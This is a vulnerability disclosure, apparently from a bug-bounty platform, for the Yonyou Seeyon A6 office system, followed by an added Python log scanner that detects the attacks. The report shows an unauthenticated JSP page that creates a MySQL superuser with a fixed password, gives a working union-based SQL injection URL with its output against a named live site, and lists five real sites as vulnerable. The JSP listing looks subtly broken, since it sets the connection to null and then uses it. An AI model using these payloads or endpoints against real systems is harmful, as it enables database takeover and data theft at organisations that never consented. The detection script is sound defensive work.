### Brief description:

Yonyou Seeyon A6 collaborative office system: sensitive information disclosure and SQL injection; the injection is union-based and can be leveraged to obtain a shell.

### Details:

#1 Database account password reset vulnerability

```
/yyoa/ext/byoa/start.jsp
```

The code of this file is:

```jsp
<%@ page import="java.sql.*" %>  <%-- import directive added for completeness; not shown in the original listing --%>
<%
Connection conn = null;
PreparedStatement pstmt = null;
// Creates the MySQL user "byoa" with the fixed password "byoa"
String sql = "create user byoa IDENTIFIED by 'byoa'";
try {
    conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection();
    pstmt = conn.prepareStatement(sql);
    out.print(pstmt.executeUpdate());
    // Grants the new user full privileges on every database
    sql = "grant all on *.* to byoa";
    pstmt = conn.prepareStatement(sql);
    out.println(pstmt.executeUpdate());
    pstmt.close();
    // Resets the password back to the fixed value "byoa"
    sql = "update mysql.user set password=password('byoa') where user='byoa'";
    pstmt = conn.prepareStatement(sql);
    out.println(pstmt.executeUpdate());
    pstmt.close();
    sql = "flush privileges";
    pstmt = conn.prepareStatement(sql);
    out.print(pstmt.executeUpdate());
    pstmt.close();
    //conn.close();
} catch (Exception ex) {
    out.println(ex.getMessage());
}
%>
```

As can be seen, this file performs no permission check whatsoever before resetting the password of the database user byoa to: byoa

#2 MySQL + JSP injection

```
/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp
```

Test method:

```
http://www.ssepec.net/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23
{'success':false,'errors':'root@localhost'}
```

### Proof of vulnerability:

5 cases:

http://www.ssepec.net
http://oa.wnq.com.cn
http://110.167.194.10:8081
http://qudao.seeyon.com
http://www.gykghn.com:8080
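As an added defensive example (not part of the original report), the following Python scanner flags requests to the two endpoints above in a web-server access log: any hit on the unauthenticated `start.jsp` credential reset, and any `isNotInTable.jsp` request whose `user_ids` parameter carries SQL keywords or comment markers as in the test above. It assumes the combined log format; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint paths taken from the report
RESET_PATH = "/yyoa/ext/byoa/start.jsp"
INJECT_PATH = "/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp"

# Combined log format (assumed): client ip, timestamp, quoted request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# SQL keywords that never belong in a list of numeric ids
SQLI_RE = re.compile(r"\b(union|select|sleep|benchmark|load_file|outfile)\b", re.I)


def classify(line):
    """Return (finding, client_ip) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path == RESET_PATH:
        # Any access at all is a finding: the page resets DB credentials unauthenticated
        return ("db-credential-reset", m.group("ip"))
    if parts.path == INJECT_PATH:
        # parse_qs percent-decodes, so "%23" becomes "#" and "%20" becomes a space
        for value in parse_qs(parts.query, keep_blank_values=True).get("user_ids", []):
            if SQLI_RE.search(value) or "#" in value or "--" in value:
                return ("sqli-user_ids", m.group("ip"))
    return None


def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in (classify(l) for l in lines) if hit is not None]


# Constructed sample log: two malicious requests from one client, two benign ones
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0800] "GET /yyoa/ext/byoa/start.jsp HTTP/1.1" 200 3',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0800] "GET /yyoa/ext/trafaxserver/ExtnoManage/'
    'isNotInTable.jsp?user_ids=(17)%20union%20all%20select%20user()%23 HTTP/1.1" 200 42',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0800] "GET /yyoa/ext/trafaxserver/ExtnoManage/'
    'isNotInTable.jsp?user_ids=(17) HTTP/1.1" 200 25',
    '198.51.100.7 - - [10/Oct/2023:13:56:05 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for finding, ip in scan(SAMPLE_LOG):
        print(f"{finding}: {ip}")
```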